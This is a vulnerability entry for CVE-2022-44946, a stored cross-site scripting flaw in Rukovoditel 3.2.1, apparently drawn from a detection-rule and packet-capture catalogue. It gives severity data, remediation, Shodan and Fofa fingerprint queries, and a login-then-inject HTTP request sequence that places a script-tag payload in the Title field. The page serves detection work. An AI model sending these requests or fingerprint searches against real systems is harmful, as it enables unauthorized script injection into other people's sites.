🔙 목록으로 돌아가기

CVE-2022-44946: Rukovoditel <= 3.2.1 - Cross-Site Scripting

TitleRukovoditel <= 3.2.1 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactAuthenticated attackers can inject malicious JavaScript through the Title field in the Add Page function to steal Rukovoditel administrator credentials and project management data when the malicious page is viewed.
RemediationUpgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.
CVSS Score5.4
EPSS Score0.01093
CVE IDCVE-2022-44946
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:-1499940355
Fofa Queryicon_hash=-1499940355
Tags cve cve2022 rukovoditel stored-xss xss authenticated vuln

🔍 Vulnerability Description

Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.

🌐 HTTP Request

GET /index.php?module=users/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.3
Connection: close
Accept-Encoding: gzip
POST /index.php?module=users/login&action=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

form_session_token=9FLHDc&username=avv3SW&password=rvAR0M
POST /index.php?module=help_pages/pages&action=save&entities_id=24&token=9FLHDc HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

form_session_token=9FLHDc&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44946.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-44946.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A